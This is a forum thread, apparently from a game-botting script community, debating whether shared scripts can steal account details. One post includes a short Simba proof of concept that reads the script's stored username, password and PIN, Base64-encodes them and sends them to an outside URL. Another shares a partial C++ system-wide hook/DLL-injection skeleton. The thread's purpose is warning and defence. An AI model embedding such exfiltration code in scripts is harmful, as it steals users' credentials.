My script is safe, and if you are not sure you can read the code yourself![]()
My script is safe, and if you are not sure you can read the code yourself![]()
A RAT regrows even after re-installing windows, all you have to do is log in. JBD's are very easy you might have gone on a website, and there has been a silent one so you got infected without knowing it. Noone should blame you hoodz, beautiful script right thereis it possible for potions
![]()
the moment you go online, you are already exposed to viruses.
please at least install somekind of firewall program such as zonealarm that controls/blocks internet access from applications.
and if you are using some old versions of windows XP, without firewall on, you are immediately exposed to blasterworm(not sure if it still exist now).
Last edited by dzpliu; 04-19-2013 at 02:16 PM.
looks like I need firewall too, not sure about that windows one
Last edited by t4q; 04-25-2013 at 11:46 AM.
I have never used a firewall and upon every Windows installation, I have disabled my firewalls.
I have not used an anti-virus/spyware in 6 years.
I have also never been hacked or received a virus, or had spyware/adware on any of my computers.
You just have to be smart about how you handle the internet: where you download stuff, what links you click, and whom you trust.
As an additional side note: yes, some scripters know very easy methods to take your account information for their own. And using ctrl+f "password" will not get you by all of them. I instead recommend using the Security Extension as it will ask permission any time a unique connection to the internet is made so you can verify it. (This will happen a ton in scripts either way, but it's the safest method when you don't know what to look for otherwise)
My Outdated ScriptsEdgeville Log Cutter | Edgeville AIO Jewelry | AIO Pickpocketer | Urn Activator | Slayer Tower | Slaying KuradalMy Working Scripts: Tutorials:Function Pointers and Why You Should Care! | Forms and Saving Settings | The Magic Behind Programming Tutorial | Recursive Recursion![]()
Here is an example how account stealing could be achieved:
Simba Code:program AccountStealPoC;
procedure DeclarePlayers;
begin
{HowManyPlayers := 1;
NumberOfPlayers(HowManyPlayers);
CurrentPlayer := 0;
with Players[0] do
begin
Name := 'ExUsername';
Pass := 'expassword';
Nick := 'sern';
Pin := '1234';
Active := True;
end;}
end;
procedure StealAccounts;
var FileHandle: Integer;
Data: String;
begin
FileHandle := OpenFile(ScriptPath + ScriptFile, False);
ReadFileString(FileHandle, Data, FileSize(FileHandle));
CloseFile(FileHandle);
Data := Between(' := 0;', 'Active', Data);
Writeln(GetPage('http://static.frement.net/srl/accountstealpoc/collect.php?d=' + Base64Encode(Data)));
end;
begin
StealAccounts;
end.
There used to be something meaningful here.
You know there is a firewall extension right?
you are lucky i guess. im saying this because i experienced such things myself. quite a few years back when i was still using windows XP or windows 98 (cant rmb which), my computer was infected with blasterworm immediately when i connect to the internet( via 56K modem) without antivirus/firewall on.
i can swear to you that in those days, i never even visited google before i switched to broadband internet in 2006. this is because internet fees were pretty expensive back then using 56K connections and i hardly even use my computers until i switched over to broadband. by then, i had already upgraded my desktop to a newer one with windows XP.
nowadays you dont face the problems i did back then because windows XP SP1 onwards already patched the loopholes even without firewall on.
Good old days when you had to install firewall before connecting to internet![]()
My Outdated ScriptsEdgeville Log Cutter | Edgeville AIO Jewelry | AIO Pickpocketer | Urn Activator | Slayer Tower | Slaying KuradalMy Working Scripts: Tutorials:Function Pointers and Why You Should Care! | Forms and Saving Settings | The Magic Behind Programming Tutorial | Recursive Recursion![]()
My Outdated ScriptsEdgeville Log Cutter | Edgeville AIO Jewelry | AIO Pickpocketer | Urn Activator | Slayer Tower | Slaying KuradalMy Working Scripts: Tutorials:Function Pointers and Why You Should Care! | Forms and Saving Settings | The Magic Behind Programming Tutorial | Recursive Recursion![]()
Incorrect. As you said, you need a native language like C/C++/Asm etc. to achieve this. I suspect you don't know what RAT means, so in case you didn't know, it stands for Remote Access Tool, which in place can do anything the designer wishes. Doesn't have to be done in Java, can be done even with Pascal!
superuser is right it is possible to do it that way. You can do a rootkit scan tho with some of the virus scanners that are out there![]()
Today is the first day of the rest of your life
Meh.. but I'm sure they'd go the lengths to write one that scans & spreads to other partitions. Most users would only format their current partition which they think has the virus and bam.. when they're done formatting, it spreads back lol. Pure evil! I would guess that it would only be able to spread back if the other partition contains an OS because it'd need Startup/Reg-run or installation as a service.
Also some users don't wipe the "System" partition that Windows-7 makes :l
Yeah. I haven't been on the "scene" for a long time and don't know for sure, but maybe it's still possible to overwrite e.g. MBR on hard-drives, which survives formatting as well.
Edit:
Hah, had to try something for the sake of good old timesI created a service, which auto starts and install system wide CBT hook (and injects DLL into each process). But, for my surprise, this is not possible out of the box anymore. Not at least in Windows 7, which is a good thing
Code:#include <windows.h> ... #pragma data_seg("Shared") HHOOK g_hHook = NULL; #pragma data_seg() #ifdef __MYHOOK_EXPORTS #define __MYHOOK_API __declspec(dllexport) #else #define __MYHOOK_API __declspec(dllimport) #endif ... LRESULT CALLBACK CBTProcedure(int nCode, WPARAM wParam, LPARAM lParam) { if (nCode < 0) return CallNextHookEx(g_hHook, nCode, wParam, lParam); if (!hWnd) return 0; switch (nCode) { case HCBT_ACTIVATE: // e.g. register window with hHWnd.. break; case HCBT_DESTROYWND: ... break; } } bool __MYHOOK_API InstallHook() { g_hHook = SetWindowsHookEx(WH_CBT, (HOOKPROC)CBTProcedure, g_hInstance, 0); return g_hHook != NULL; } BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: ... break; } return TRUE; }
I use the scripts you mentioned using..
Never ever had a problem with a "hacker" stealing my GPz through "zimba"
So I am not sure if someone else touched this topic with this approach. Please upload the script to Pastebin or PasteIt and message me the URL. I will check the script over and guess what...Mystery solved. Rather than trying to suggest ways of how it is possible, lets try to figure out if it was even true?
![]()
If by any chance you are willing to use pastebin, feel free to send that URL to the mods and I![]()
We are all born ignorant, but one must work hard to remain stupid. - Benjamin Franklin
There are currently 1 users browsing this thread. (0 members and 1 guests)